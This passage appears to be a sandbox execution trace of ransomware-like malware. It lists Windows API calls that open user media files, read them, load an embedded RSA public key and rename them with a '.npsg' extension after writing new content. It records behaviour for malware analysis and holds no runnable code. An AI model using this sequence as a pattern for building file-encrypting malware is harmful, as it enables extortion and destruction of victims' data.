returned 0x3b94c18 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86318 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.963] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x290b, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb14*=0x290b, lpOverlapped=0x0) returned 1 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.963] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.963] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0238.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.963] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.964] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.964] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.964] CloseHandle (hObject=0x644) returned 1 [0238.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0238.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0238.965] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Dvx4JbN1scNn5l.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\dvx4jbn1scnn5l.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Dvx4JbN1scNn5l.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\dvx4jbn1scnn5l.wav.npsg")) returned 1 [0238.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.966] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.968] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7739b710, ftCreationTime.dwHighDateTime=0x1d5c559, ftLastAccessTime.dwLowDateTime=0xaa9c8b60, ftLastAccessTime.dwHighDateTime=0x1d5c08f, ftLastWriteTime.dwLowDateTime=0xaa9c8b60, ftLastWriteTime.dwHighDateTime=0x1d5c08f, nFileSizeHigh=0x0, nFileSizeLow=0xc98d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Is7zHJ.m4a", cAlternateFileName="")) returned 1 [0238.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.968] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Is7zHJ.m4a") returned=".m4a" [0238.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Is7zHJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\is7zhj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.968] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=51597) returned 1 [0238.968] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.971] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc967, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.971] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.973] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.973] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xc98d, lpOverlapped=0x0) returned 1 [0238.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.974] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.976] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.976] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.976] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.976] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.976] GetLastError () returned 0x0 [0238.976] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.976] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.976] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.976] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.976] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc990) returned 0x3b95d50 [0238.977] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86318 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bf0 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86360 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c50 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.977] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0238.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c50 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c38 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.979] GetCurrentThreadId () returned 0x5b4 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87828 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.979] GetCurrentThreadId () returned 0x5b4 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0238.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c50 [0238.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c20 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cb0 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cc8 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c68 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c38 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 